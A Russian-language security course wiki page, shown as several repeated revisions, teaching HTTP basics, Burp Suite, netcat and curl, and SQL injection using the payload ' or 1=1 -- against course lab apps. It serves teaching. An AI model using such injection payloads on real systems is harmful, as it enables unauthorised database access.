'''Netcat''' ([https://www.opennet.ru/man.shtml?topic=netcat man]) позволяет установить tcp-соединение, после чего отправляет на другой конец всё что подано ему на стандартный ввод и печатает на стандартный вывод всё, что получил. Он позволяет буквально "руками" набрать и отправить HTTP-запрос. Вот как можно отправить запрос, соответствующий переходу по URL http://mail.ru:
<pre>$ nc mail.ru 80
GET / HTTP/1.1
Host: mail.ru

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:08:08 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html>
^C</pre>
То же самое, но с флагом "-v" (который говорит Netcat выдавать более подробную диагностику, в т. ч. написать об успешности установления TCP-соединения и парой дополнительных HTTP-заголовков (заголовок "Connection: close" говорит серверу что после этого запроса TCP-соединение будет закрыто, новых запросов в нём не будет):
<pre>$ nc -v mail.ru 80
Connection to mail.ru 80 port [tcp/http] succeeded!
GET / HTTP/1.1
Host: mail.ru
Accept: */*
Connection: close

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:14:37 GMT
Content-Type: text/html
Content-Length: 185
Connection: close
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html></pre>

'''curl''' ([https://curl.haxx.se/docs/manpage.html man]) позволяет очень просто делать HTTP-запросы из консоли.
<pre>$ curl -v http://example.org
* Rebuilt URL to: http://example.org/
* Trying 93.184.216.34...
* TCP_NODELAY set
* Connected to example.org (93.184.216.34) port 80 (#0)
> GET / HTTP/1.1
> Host: example.org
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Cache-Control: max-age=604800
< Content-Type: text/html; charset=UTF-8
< Date: Sun, 24 Feb 2019 20:33:38 GMT
< Etag: "1541025663+ident"
< Expires: Sun, 03 Mar 2019 20:33:38 GMT
< Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
< Server: ECS (phd/FD58)
< Vary: Accept-Encoding
< X-Cache: HIT
< Content-Length: 1270
<
<!doctype html>
<html>
<head>
<title>Example Domain</title>

<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
...</pre>

== SQL injection ==

Веб-приложения нередко используют SQL-базы данных, т. е. такие БД, взаимодействие с которыми осуществляется через запросы на языке '''SQL''' ([https://ru.wikipedia.org/wiki/SQL википедия], [http://citforum.ru/database/osbd/glava_55.shtml#_5 курс "Основы современных баз данных" С.Д. Кузнецова]). Поиграться с SQL можно просто в [http://sqlfiddle.postgrespro.ru/#!17//5814 SQL Fiddle] или с помощью [https://linux.die.net/man/1/sqlite3 sqlite3]. Пример SQL-запросов и ответов на них:<br>[[Файл:Sql1-annotated.png]]<br>[[Файл:Sql2-annotated.png]]<br>Веб-приложение формирует и отправляет базе SQL-запросы, которые могут зависеть от параметров, пришедших от клиента (взятых из HTTP-запроса). SQL-запросы текстовые и простой способ сделать запрос, зависящий от параметра - просто подставить этот параметр в текст запроса.
Пример кода (на языке [https://www.python.org/ Python]), подставляющего параметр из HTTP-запроса в SQL-запрос к базе:
[[Файл:Sqli-code.png|650px]]
Здесь "request.args.get('login')" считывает значение параметра "login" query string запроса. Вот какой вид примет запрос, если параметр login будет иметь значение "testuser".

[[Файл:Sql-req.png|520px]]

Значение "testuser" подставилось в строковый литерал в одинарных кавычках. Говорят, что значение попало в '''контекст''' строкового литерала.
После такой подстановки может оказаться, что смысл SQL-запроса изменился и данные, подставленые в запрос стали не просто значением параметра запроса (скажем, числовым или стокововым литералом), а какими-то еще конструкциями языка SQL. Вот какой запрос будет сформирован, если параметр "login" будет иметь значение <code>' or 1=1 --</code>:

[[Файл:Sqli-annot.png|540px]]

В результате выражение в <code>WHERE</code>-части приняло вид <code>login='' or 1=1</code>, оно будет истинным для любой строки таблицы, в результате чего в ответ на этот запрос будут возвращены все строки таблицы (кстати, чтобы это реально сработало для mysql-базы, надо чтобы после <code>--</code> ещё стоял символ пробела, в URL его можно послать как <code>%20</code>, либо вместо <code>--</code> использовать другой символ комментария - решётку (<code>%23</code>)). Так же можно изменить смысл запроса и передав специфическое значение параметра id для этого кода (для этого даже не придётся добавлять в значение параметра кавычку):

[[Файл:Sql-id.png|520px]]

Возможность передать такое значение параметра HTTP-запроса, которое подставится в текст SQL-запроса и при подстановке изменит смысл этого запроса называется '''SQL injection''' ([https://www.owasp.org/index.php/SQL_Injection OWASP]). Хорошую статью про SQL injection можно [https://rdot.org/forum/showthread.php?s=f4292383c9896b773bd98d827eb9411f&t=124 найти тут] и [http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet еще тут].

Попробовать эксплуатировать SQL injection можно на этих уязвимых приложениях:
* http://sql1.stands.course.secsem.ru/ ([https://course.secsem.ru/task-src/sql1.tgz приблизительный исходный код])
* http://sql2.stands.course.secsem.ru/

Фактически, SQLi это один из представителей класса уязвимостей '''injection''', которые получаются, если в какие-то управляющие команды подставляются параметры-данные от пользователя и эти данные могут выйти из контекста, куда подставляются, перестав быть просто данными, и поменять смысл команды.

Введение в практическую безопасность (2019)/HTTP, инструменты & SQL injection

2022-06-30T17:35:12Z

Asterite: /* SQL injection */

__NOTOC__
== HTTP ==

Клиенты (например, веб-браузеры) взаимодействуют с веб-приложениями по протоколу '''HTTP''' ([https://ru.wikipedia.org/wiki/HTTP википедия], стандарт HTTP 1.1: [https://tools.ietf.org/html/rfc2616 RFC 2616], [https://tools.ietf.org/html/rfc7230 RFC 7230], [https://tools.ietf.org/html/rfc7231 RFC 7231]). Он работает поверх [https://ru.wikipedia.org/wiki/Transmission_Control_Protocol TCP], стандартный TCP-порт для HTTP это порт '''80''', а для HTTPS (HTTP поверх SSL, т. е. с шифрованием) это порт '''443'''. Протокол состоит из запросов (которые клиент отправляет серверу) и ответов (которые сервер присылает в ответ). Протокол HTTP версии 1.1 (наиболее используемой в данный момент) и более ранних - текстовый, то есть сообщения этого протокола человекочитаемые. К примеру, вот запрос, который сделает браузер при переходе по URL http://sql1.stands.course.secsem.ru/users:<br>[[Файл:Http-req-annot.png]] <br>Ответ сервера на него:<br>[[Файл:Http-res-annot.png]]<br>Ещё пример, запрос, который сделает браузер при попытке (неудачной) залогиниться на сайте vk.com c почтой "admin@adminmail.ru" и паролем "adminpassword":<br>[[Файл:Http-req-post-annot.png]]<br>Ответ сервера на этот запрос<br>[[Файл:Http-res-post-annot.png]]

Еще информация: про основы веб-технологий <s>[http://old.secsem.ru/lections?action=AttachFile&do=get&target=infosec-network2013-4-%D0%9E%D1%81%D0%BD%D0%BE%D0%B2%D1%8B+%D0%B2%D0%B5%D0%B1-%D1%82%D0%B5%D1%85%D0%BD%D0%BE%D0%BB%D0%BE%D0%B3%D0%B8%D0%B9.pdf в слайдах нашего спецкурса 2013 года]</s> [https://www.youtube.com/watch?v=drpCqzSpvq4 в видео лекции Андрея Петухова на нашем спецкурсе 2013 года].

== Инструменты ==

=== Burp Suite ===

Для анализа HTTP-взаимодействия между клиентом и сервером, а также для вмешательства в него удобен '''Burp Suite'''. Он может работать как HTTP-proxy, то есть получать от клиента запрос и пересылать его серверу, получать ответ сервера и передавать его клиенту. При этом Burp может показывать запросы и ответы пользователю, задерживать и изменять их. Кроме этого, он может формировать и отправлять новые HTTP-запросы сам ("вручную"). [https://portswigger.net/burp/documentation/desktop/getting-started Здесь написано как его скачать и начать использовать].

=== Netcat и curl ===

Более простые инструменты, позволяющие отправлять HTTP-запросы веб-приложению и получать ответы - '''netcat''' и '''curl'''.

'''Netcat''' ([https://www.opennet.ru/man.shtml?topic=netcat man]) позволяет установить tcp-соединение, после чего отправляет на другой конец всё что подано ему на стандартный ввод и печатает на стандартный вывод всё, что получил. Он позволяет буквально "руками" набрать и отправить HTTP-запрос. Вот как можно отправить запрос, соответствующий переходу по URL http://mail.ru:
<pre>$ nc mail.ru 80
GET / HTTP/1.1
Host: mail.ru

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:08:08 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html>
^C</pre>
То же самое, но с флагом "-v" (который говорит Netcat выдавать более подробную диагностику, в т. ч. написать об успешности установления TCP-соединения и парой дополнительных HTTP-заголовков (заголовок "Connection: close" говорит серверу что после этого запроса TCP-соединение будет закрыто, новых запросов в нём не будет):
<pre>$ nc -v mail.ru 80
Connection to mail.ru 80 port [tcp/http] succeeded!
GET / HTTP/1.1
Host: mail.ru
Accept: */*
Connection: close

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:14:37 GMT
Content-Type: text/html
Content-Length: 185
Connection: close
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html></pre>

'''curl''' ([https://curl.haxx.se/docs/manpage.html man]) позволяет очень просто делать HTTP-запросы из консоли.
<pre>$ curl -v http://example.org
* Rebuilt URL to: http://example.org/
* Trying 93.184.216.34...
* TCP_NODELAY set
* Connected to example.org (93.184.216.34) port 80 (#0)
> GET / HTTP/1.1
> Host: example.org
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Cache-Control: max-age=604800
< Content-Type: text/html; charset=UTF-8
< Date: Sun, 24 Feb 2019 20:33:38 GMT
< Etag: "1541025663+ident"
< Expires: Sun, 03 Mar 2019 20:33:38 GMT
< Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
< Server: ECS (phd/FD58)
< Vary: Accept-Encoding
< X-Cache: HIT
< Content-Length: 1270
<
<!doctype html>
<html>
<head>
<title>Example Domain</title>

<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
...</pre>

== SQL injection ==

Веб-приложения нередко используют SQL-базы данных, т. е. такие БД, взаимодействие с которыми осуществляется через запросы на языке '''SQL''' ([https://ru.wikipedia.org/wiki/SQL википедия], [http://citforum.ru/database/osbd/glava_55.shtml#_5 курс "Основы современных баз данных" С.Д. Кузнецова]). Поиграться с SQL можно просто в [http://sqlfiddle.postgrespro.ru/#!17//5814 SQL Fiddle] или с помощью [https://linux.die.net/man/1/sqlite3 sqlite3]. Пример SQL-запросов и ответов на них:<br>[[Файл:Sql1-annotated.png]]<br>[[Файл:Sql2-annotated.png]]<br>Веб-приложение формирует и отправляет базе SQL-запросы, которые могут зависеть от параметров, пришедших от клиента (взятых из HTTP-запроса). SQL-запросы текстовые и простой способ сделать запрос, зависящий от параметра - просто подставить этот параметр в текст запроса.
Пример кода (на языке [https://www.python.org/ Python]), подставляющего параметр из HTTP-запроса в SQL-запрос к базе:
[[Файл:Sqli-code.png|650px]]
Здесь "request.args.get('login')" считывает значение параметра "login" query string запроса. Вот какой вид примет запрос, если параметр login будет иметь значение "testuser".

[[Файл:Sql-req.png|520px]]

Значение "testuser" подставилось в строковый литерал в одинарных кавычках. Говорят, что значение попало в '''контекст''' строкового литерала.
После такой подстановки может оказаться, что смысл SQL-запроса изменился и данные, подставленые в запрос стали не просто значением параметра запроса (скажем, числовым или стокововым литералом), а какими-то еще конструкциями языка SQL. Вот какой запрос будет сформирован, если параметр "login" будет иметь значение <code>' or 1=1 --</code>:

[[Файл:Sqli-annot.png|540px]]

В результате выражение в <code>WHERE</code>-части приняло вид <code>login='' or 1=1</code>, оно будет истинным для любой строки таблицы, в результате чего в ответ на этот запрос будут возвращены все строки таблицы (кстати, чтобы это реально сработало для mysql-базы, надо чтобы после <code>--</code> ещё стоял символ пробела, в URL его можно послать как <code>%20</code>, либо вместо <code>--</code>
использовать другой символ комментария - решётку (<code>%23</code>)). Так же можно изменить смысл запроса и передав специфическое значение параметра id для этого кода (для этого даже не придётся добавлять в значение параметра кавычку):

[[Файл:Sql-id.png|520px]]

Возможность передать такое значение параметра HTTP-запроса, которое подставится в текст SQL-запроса и при подстановке изменит смысл этого запроса называется '''SQL injection''' ([https://www.owasp.org/index.php/SQL_Injection OWASP]). Хорошую статью про SQL injection можно [https://rdot.org/forum/showthread.php?s=f4292383c9896b773bd98d827eb9411f&t=124 найти тут] и [http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet еще тут].

Попробовать эксплуатировать SQL injection можно на этих уязвимых приложениях:
* http://sql1.stands.course.secsem.ru/ ([https://course.secsem.ru/task-src/sql1.tgz приблизительный исходный код])
* http://sql2.stands.course.secsem.ru/

Фактически, SQLi это один из представителей класса уязвимостей '''injection''', которые получаются, если в какие-то управляющие команды подставляются параметры-данные от пользователя и эти данные могут выйти из контекста, куда подставляются, перестав быть просто данными, и поменять смысл команды.

Введение в практическую безопасность (2019)/HTTP, инструменты & SQL injection

2022-06-30T17:34:25Z

Asterite: /* SQL injection */

__NOTOC__
== HTTP ==

Клиенты (например, веб-браузеры) взаимодействуют с веб-приложениями по протоколу '''HTTP''' ([https://ru.wikipedia.org/wiki/HTTP википедия], стандарт HTTP 1.1: [https://tools.ietf.org/html/rfc2616 RFC 2616], [https://tools.ietf.org/html/rfc7230 RFC 7230], [https://tools.ietf.org/html/rfc7231 RFC 7231]). Он работает поверх [https://ru.wikipedia.org/wiki/Transmission_Control_Protocol TCP], стандартный TCP-порт для HTTP это порт '''80''', а для HTTPS (HTTP поверх SSL, т. е. с шифрованием) это порт '''443'''. Протокол состоит из запросов (которые клиент отправляет серверу) и ответов (которые сервер присылает в ответ). Протокол HTTP версии 1.1 (наиболее используемой в данный момент) и более ранних - текстовый, то есть сообщения этого протокола человекочитаемые. К примеру, вот запрос, который сделает браузер при переходе по URL http://sql1.stands.course.secsem.ru/users:<br>[[Файл:Http-req-annot.png]] <br>Ответ сервера на него:<br>[[Файл:Http-res-annot.png]]<br>Ещё пример, запрос, который сделает браузер при попытке (неудачной) залогиниться на сайте vk.com c почтой "admin@adminmail.ru" и паролем "adminpassword":<br>[[Файл:Http-req-post-annot.png]]<br>Ответ сервера на этот запрос<br>[[Файл:Http-res-post-annot.png]]

Еще информация: про основы веб-технологий <s>[http://old.secsem.ru/lections?action=AttachFile&do=get&target=infosec-network2013-4-%D0%9E%D1%81%D0%BD%D0%BE%D0%B2%D1%8B+%D0%B2%D0%B5%D0%B1-%D1%82%D0%B5%D1%85%D0%BD%D0%BE%D0%BB%D0%BE%D0%B3%D0%B8%D0%B9.pdf в слайдах нашего спецкурса 2013 года]</s> [https://www.youtube.com/watch?v=drpCqzSpvq4 в видео лекции Андрея Петухова на нашем спецкурсе 2013 года].

== Инструменты ==

=== Burp Suite ===

Для анализа HTTP-взаимодействия между клиентом и сервером, а также для вмешательства в него удобен '''Burp Suite'''. Он может работать как HTTP-proxy, то есть получать от клиента запрос и пересылать его серверу, получать ответ сервера и передавать его клиенту. При этом Burp может показывать запросы и ответы пользователю, задерживать и изменять их. Кроме этого, он может формировать и отправлять новые HTTP-запросы сам ("вручную"). [https://portswigger.net/burp/documentation/desktop/getting-started Здесь написано как его скачать и начать использовать].

=== Netcat и curl ===

Более простые инструменты, позволяющие отправлять HTTP-запросы веб-приложению и получать ответы - '''netcat''' и '''curl'''.

'''Netcat''' ([https://www.opennet.ru/man.shtml?topic=netcat man]) позволяет установить tcp-соединение, после чего отправляет на другой конец всё что подано ему на стандартный ввод и печатает на стандартный вывод всё, что получил. Он позволяет буквально "руками" набрать и отправить HTTP-запрос. Вот как можно отправить запрос, соответствующий переходу по URL http://mail.ru:
<pre>$ nc mail.ru 80
GET / HTTP/1.1
Host: mail.ru

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:08:08 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html>
^C</pre>
То же самое, но с флагом "-v" (который говорит Netcat выдавать более подробную диагностику, в т. ч. написать об успешности установления TCP-соединения и парой дополнительных HTTP-заголовков (заголовок "Connection: close" говорит серверу что после этого запроса TCP-соединение будет закрыто, новых запросов в нём не будет):
<pre>$ nc -v mail.ru 80
Connection to mail.ru 80 port [tcp/http] succeeded!
GET / HTTP/1.1
Host: mail.ru
Accept: */*
Connection: close

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:14:37 GMT
Content-Type: text/html
Content-Length: 185
Connection: close
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html></pre>

'''curl''' ([https://curl.haxx.se/docs/manpage.html man]) позволяет очень просто делать HTTP-запросы из консоли.
<pre>$ curl -v http://example.org
* Rebuilt URL to: http://example.org/
* Trying 93.184.216.34...
* TCP_NODELAY set
* Connected to example.org (93.184.216.34) port 80 (#0)
> GET / HTTP/1.1
> Host: example.org
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Cache-Control: max-age=604800
< Content-Type: text/html; charset=UTF-8
< Date: Sun, 24 Feb 2019 20:33:38 GMT
< Etag: "1541025663+ident"
< Expires: Sun, 03 Mar 2019 20:33:38 GMT
< Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
< Server: ECS (phd/FD58)
< Vary: Accept-Encoding
< X-Cache: HIT
< Content-Length: 1270
<
<!doctype html>
<html>
<head>
<title>Example Domain</title>

<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
...</pre>

== SQL injection ==

Веб-приложения нередко используют SQL-базы данных, т. е. такие БД, взаимодействие с которыми осуществляется через запросы на языке '''SQL''' ([https://ru.wikipedia.org/wiki/SQL википедия], [http://citforum.ru/database/osbd/glava_55.shtml#_5 курс "Основы современных баз данных" С.Д. Кузнецова]). Поиграться с SQL можно просто в [http://sqlfiddle.postgrespro.ru/#!17//5814 SQL Fiddle] или с помощью [https://linux.die.net/man/1/sqlite3 sqlite3]. Пример SQL-запросов и ответов на них:<br>[[Файл:Sql1-annotated.png]]<br>[[Файл:Sql2-annotated.png]]<br>Веб-приложение формирует и отправляет базе SQL-запросы, которые могут зависеть от параметров, пришедших от клиента (взятых из HTTP-запроса). SQL-запросы текстовые и простой способ сделать запрос, зависящий от параметра - просто подставить этот параметр в текст запроса.
Пример кода (на языке [https://www.python.org/ Python]), подставляющего параметр из HTTP-запроса в SQL-запрос к базе:
[[Файл:Sqli-code.png|650px]]
Здесь "request.args.get('login')" считывает значение параметра "login" query string запроса. Вот какой вид примет запрос, если параметр login будет иметь значение "testuser".

[[Файл:Sql-req.png|520px]]

Значение "testuser" подставилось в строковый литерал в одинарных кавычках. Говорят, что значение попало в '''контекст''' строкового литерала.
После такой подстановки может оказаться, что смысл SQL-запроса изменился и данные, подставленые в запрос стали не просто значением параметра запроса (скажем, числовым или стокововым литералом), а какими-то еще конструкциями языка SQL. Вот какой запрос будет сформирован, если параметр "login" будет иметь значение <code>' or 1=1 --</code>:

[[Файл:Sqli-annot.png|540px]]

В результате выражение в <code>WHERE</code>-части приняло вид <code>login='' or 1=1</code>, оно будет истинным для любой строки таблицы, в результате чего в ответ на этот запрос будут возвращены все строки таблицы (кстати, чтобы это реально сработало для mysql-базы, надо чтобы после <code>--</code> ещё стоял символ пробела (в URL его можно послать как <code>%20</code>, либо вместо <code>--</code>
использовать другой символ комментария - решётку (<code>%23</code>). Так же можно изменить смысл запроса и передав специфическое значение параметра id для этого кода (для этого даже не придётся добавлять в значение параметра кавычку):

[[Файл:Sql-id.png|520px]]

Возможность передать такое значение параметра HTTP-запроса, которое подставится в текст SQL-запроса и при подстановке изменит смысл этого запроса называется '''SQL injection''' ([https://www.owasp.org/index.php/SQL_Injection OWASP]). Хорошую статью про SQL injection можно [https://rdot.org/forum/showthread.php?s=f4292383c9896b773bd98d827eb9411f&t=124 найти тут] и [http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet еще тут].

Попробовать эксплуатировать SQL injection можно на этих уязвимых приложениях:
* http://sql1.stands.course.secsem.ru/ ([https://course.secsem.ru/task-src/sql1.tgz приблизительный исходный код])
* http://sql2.stands.course.secsem.ru/

Фактически, SQLi это один из представителей класса уязвимостей '''injection''', которые получаются, если в какие-то управляющие команды подставляются параметры-данные от пользователя и эти данные могут выйти из контекста, куда подставляются, перестав быть просто данными, и поменять смысл команды.

Введение в практическую безопасность (2019)/HTTP, инструменты & SQL injection

2022-06-30T17:29:54Z

Asterite: /* SQL injection */

__NOTOC__
== HTTP ==

Клиенты (например, веб-браузеры) взаимодействуют с веб-приложениями по протоколу '''HTTP''' ([https://ru.wikipedia.org/wiki/HTTP википедия], стандарт HTTP 1.1: [https://tools.ietf.org/html/rfc2616 RFC 2616], [https://tools.ietf.org/html/rfc7230 RFC 7230], [https://tools.ietf.org/html/rfc7231 RFC 7231]). Он работает поверх [https://ru.wikipedia.org/wiki/Transmission_Control_Protocol TCP], стандартный TCP-порт для HTTP это порт '''80''', а для HTTPS (HTTP поверх SSL, т. е. с шифрованием) это порт '''443'''. Протокол состоит из запросов (которые клиент отправляет серверу) и ответов (которые сервер присылает в ответ). Протокол HTTP версии 1.1 (наиболее используемой в данный момент) и более ранних - текстовый, то есть сообщения этого протокола человекочитаемые. К примеру, вот запрос, который сделает браузер при переходе по URL http://sql1.stands.course.secsem.ru/users:<br>[[Файл:Http-req-annot.png]] <br>Ответ сервера на него:<br>[[Файл:Http-res-annot.png]]<br>Ещё пример, запрос, который сделает браузер при попытке (неудачной) залогиниться на сайте vk.com c почтой "admin@adminmail.ru" и паролем "adminpassword":<br>[[Файл:Http-req-post-annot.png]]<br>Ответ сервера на этот запрос<br>[[Файл:Http-res-post-annot.png]]

Еще информация: про основы веб-технологий <s>[http://old.secsem.ru/lections?action=AttachFile&do=get&target=infosec-network2013-4-%D0%9E%D1%81%D0%BD%D0%BE%D0%B2%D1%8B+%D0%B2%D0%B5%D0%B1-%D1%82%D0%B5%D1%85%D0%BD%D0%BE%D0%BB%D0%BE%D0%B3%D0%B8%D0%B9.pdf в слайдах нашего спецкурса 2013 года]</s> [https://www.youtube.com/watch?v=drpCqzSpvq4 в видео лекции Андрея Петухова на нашем спецкурсе 2013 года].

== Инструменты ==

=== Burp Suite ===

Для анализа HTTP-взаимодействия между клиентом и сервером, а также для вмешательства в него удобен '''Burp Suite'''. Он может работать как HTTP-proxy, то есть получать от клиента запрос и пересылать его серверу, получать ответ сервера и передавать его клиенту. При этом Burp может показывать запросы и ответы пользователю, задерживать и изменять их. Кроме этого, он может формировать и отправлять новые HTTP-запросы сам ("вручную"). [https://portswigger.net/burp/documentation/desktop/getting-started Здесь написано как его скачать и начать использовать].

=== Netcat и curl ===

Более простые инструменты, позволяющие отправлять HTTP-запросы веб-приложению и получать ответы - '''netcat''' и '''curl'''.

'''Netcat''' ([https://www.opennet.ru/man.shtml?topic=netcat man]) позволяет установить tcp-соединение, после чего отправляет на другой конец всё что подано ему на стандартный ввод и печатает на стандартный вывод всё, что получил. Он позволяет буквально "руками" набрать и отправить HTTP-запрос. Вот как можно отправить запрос, соответствующий переходу по URL http://mail.ru:
<pre>$ nc mail.ru 80
GET / HTTP/1.1
Host: mail.ru

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:08:08 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html>
^C</pre>
То же самое, но с флагом "-v" (который говорит Netcat выдавать более подробную диагностику, в т. ч. написать об успешности установления TCP-соединения и парой дополнительных HTTP-заголовков (заголовок "Connection: close" говорит серверу что после этого запроса TCP-соединение будет закрыто, новых запросов в нём не будет):
<pre>$ nc -v mail.ru 80
Connection to mail.ru 80 port [tcp/http] succeeded!
GET / HTTP/1.1
Host: mail.ru
Accept: */*
Connection: close

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Sun, 24 Feb 2019 20:14:37 GMT
Content-Type: text/html
Content-Length: 185
Connection: close
Location: https://mail.ru
X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.14.1</center>
</body>
</html></pre>

'''curl''' ([https://curl.haxx.se/docs/manpage.html man]) позволяет очень просто делать HTTP-запросы из консоли.
<pre>$ curl -v http://example.org
* Rebuilt URL to: http://example.org/
* Trying 93.184.216.34...
* TCP_NODELAY set
* Connected to example.org (93.184.216.34) port 80 (#0)
> GET / HTTP/1.1
> Host: example.org
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Cache-Control: max-age=604800
< Content-Type: text/html; charset=UTF-8
< Date: Sun, 24 Feb 2019 20:33:38 GMT
< Etag: "1541025663+ident"
< Expires: Sun, 03 Mar 2019 20:33:38 GMT
< Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
< Server: ECS (phd/FD58)
< Vary: Accept-Encoding
< X-Cache: HIT
< Content-Length: 1270
<
<!doctype html>
<html>
<head>
<title>Example Domain</title>

<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
...</pre>

== SQL injection ==

Веб-приложения нередко используют SQL-базы данных, т. е. такие БД, взаимодействие с которыми осуществляется через запросы на языке '''SQL''' ([https://ru.wikipedia.org/wiki/SQL википедия], [http://citforum.ru/database/osbd/glava_55.shtml#_5 курс "Основы современных баз данных" С.Д. Кузнецова]). Поиграться с SQL можно просто в [http://sqlfiddle.postgrespro.ru/#!17//5814 SQL Fiddle] или с помощью [https://linux.die.net/man/1/sqlite3 sqlite3]. Пример SQL-запросов и ответов на них:<br>[[Файл:Sql1-annotated.png]]<br>[[Файл:Sql2-annotated.png]]<br>Веб-приложение формирует и отправляет базе SQL-запросы, которые могут зависеть от параметров, пришедших от клиента (взятых из HTTP-запроса). SQL-запросы текстовые и простой способ сделать запрос, зависящий от параметра - просто подставить этот параметр в текст запроса.
Пример кода (на языке [https://www.python.org/ Python]), подставляющего параметр из HTTP-запроса в SQL-запрос к базе:
[[Файл:Sqli-code.png|650px]]
Здесь "request.args.get('login')" считывает значение параметра "login" query string запроса. Вот какой вид примет запрос, если параметр login будет иметь значение "testuser".

[[Файл:Sql-req.png|520px]]

Значение "testuser" подставилось в строковый литерал в одинарных кавычках. Говорят, что значение попало в '''контекст''' строкового литерала.
После такой подстановки может оказаться, что смысл SQL-запроса изменился и данные, подставленые в запрос стали не просто значением параметра запроса (скажем, числовым или стокововым литералом), а какими-то еще конструкциями языка SQL. Вот какой запрос будет сформирован, если параметр "login" будет иметь значение <code>' or 1=1 --</code>:

[[Файл:Sqli-annot.png|540px]]

В результате выражение в <code>WHERE</code>-части приняло вид <code>login='' or 1=1</code>, оно будет истинным для любой строки таблицы, в результате чего в ответ на этот запрос будут возвращены все строки таблицы. Так же можно изменить смысл запроса и передав специфическое значение параметра id для этого кода (для этого даже не придётся добавлять в значение параметра кавычку):

[[Файл:Sql-id.png|520px]]

Возможность передать такое значение параметра HTTP-запроса, которое подставится в текст SQL-запроса и при подстановке изменит смысл этого запроса называется '''SQL injection''' ([https://www.owasp.org/index.php/SQL_Injection OWASP]). Хорошую статью про SQL injection можно [https://rdot.org/forum/showthread.php?s=f4292383c9896b773bd98d827eb9411f&t=124 найти тут] и [http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet еще тут].

Попробовать эксплуатировать SQL injection можно на этих уязвимых приложениях:
* http://sql1.stands.course.secsem.ru/ ([https://course.secsem.ru/task-src/sql1.tgz приблизительный исходный код])
* http://sql2.stands.course.secsem.ru/

Фактически, SQLi это один из представителей класса уязвимостей '''injection''', которые получаются, если в какие-то управляющие команды подставляются параметры-данные от пользователя и эти данные могут выйти из контекста, куда подставляются, перестав быть просто данными, и поменять смысл команды.

Введение в практическую безопасность (2019)/HTTP, инструменты & SQL injection

2022-06-30T17:27:49Z

Asterite: /* Burp Suite */

__NOTOC__
== HTTP ==

